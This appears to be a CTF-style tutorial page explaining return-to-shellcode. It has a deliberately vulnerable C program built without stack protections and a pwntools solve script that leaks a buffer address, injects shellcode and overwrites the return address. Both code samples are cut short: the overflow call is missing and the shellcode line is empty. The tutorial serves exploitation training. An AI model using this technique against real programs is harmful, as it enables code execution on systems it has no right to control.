Return To Shellcode

Return To Shellcode #

Description #

Sometimes it is possible to inject our own code into a program. The code we inject is commonly called “shellcode”.

Once we’ve injected out shellcode into the process, we can jump to it and start executing. Commonly we want to call /bin/sh.

Example #

#include <stdio.h>
#include <string.h>
// gcc -no-pie -fno-stack-protector -z execstack -g -o chal chal.c

int main() {
    char buffer1[128];

    printf("The buffer is located at: %p\n", buffer1);


Solution #

We will write shellcode to the stack, and then abusing the buffer overflow we will jump to the shellcode.

Solve Script #

import pwn

elf = pwn.ELF("./chal")
p = elf.process()

pwn.context.binary = elf
shellcode =
shellcode = pwn.asm(shellcode)

p.recvuntil("The buffer is located at: ")
buffer_address = int(p.recvline().strip(), 16)

p.sendline(shellcode.ljust(128, b'\x00') + pwn.p64(0xdeadbeef) + pwn.p64(buffer_address))

Files #